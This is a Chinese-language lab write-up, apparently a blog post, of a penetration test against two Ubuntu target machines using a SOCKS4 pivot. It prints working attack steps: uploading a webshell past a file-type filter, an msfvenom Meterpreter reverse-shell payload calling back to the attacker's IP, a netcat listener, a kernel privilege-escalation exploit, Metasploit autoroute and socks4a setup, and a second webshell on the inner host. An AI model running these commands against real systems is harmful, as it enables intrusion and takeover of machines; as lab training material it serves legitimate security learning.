前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >socks4代理网络渗透测试实验

socks4代理网络渗透测试实验

作者头像
全栈程序员站长
发布2022-07-02 11:06:23
6380
发布2022-07-02 11:06:23
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

代码语言:javascript
复制
            实验目的:利用代理功能对2层网络进行渗透
  测试靶机  ubantu 192.168.31.207  192.168.1.129
                  ubantu  192.168.1.100 

首先访问192.168.31.207

一个简单得上传界面,这个界面做了文件类型的检测,直接上传是不行的,我们选择一句话木马,然后抓包修改文件类型,将

改为

放包就上传成功了

菜刀连接文件地址

kali打开msf控制台,设置模块exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.31.43 set LPORT 8888

利用msfvenom生成elf木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.43 LPORT=8888 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >1.elf 利用菜刀上传php大马,并将生成的elf木马上传到目标机 进入大马进行反弹shell提权 kali本地监听12388端口 nc -lvvp 12388

大马进行反弹shell

反弹成功

uname -a 查看内核版本 并对上传对应的提权脚本进行提权 我用的是3.3.13内核的脚本 gcc shell.c -o shell ./shell 提权成功

我们给上传的elf木马权限并执行 chmod 777 1.elf ./elf

成功获得一个会话连接

添加一个路由 run autoroute -s 192.168.1.0/24

本地设置socks4代理 use auxiliary/server/socks4a set SRVPORT 9999 开启新的终端 编辑 vim /etc/proxychains.conf

将设置的socks4添加进末尾 代理打开firefox

访问192.168.1.100

弱口令登陆后台,在设置处添加可以上传的文件类型 其他格式添加php,PHP,php3

添加新文章上传php大马

直接拖拽成功上传后,可以查看路径,直接访问地址

由于msf的路由功能不稳定,所以代理得到的会话很不稳定,并且没有重新连接的功能,所以做内网渗透的时候还是尽量使用稳定的代理工具,如regerog+proxifier,regeorg+proxychains等相对稳定工具,当然如果自己有公网ip的话,还可以使用端口转发工具,这里就不赘述了 以上操作仅供大家学习参考使用,

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/147667.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档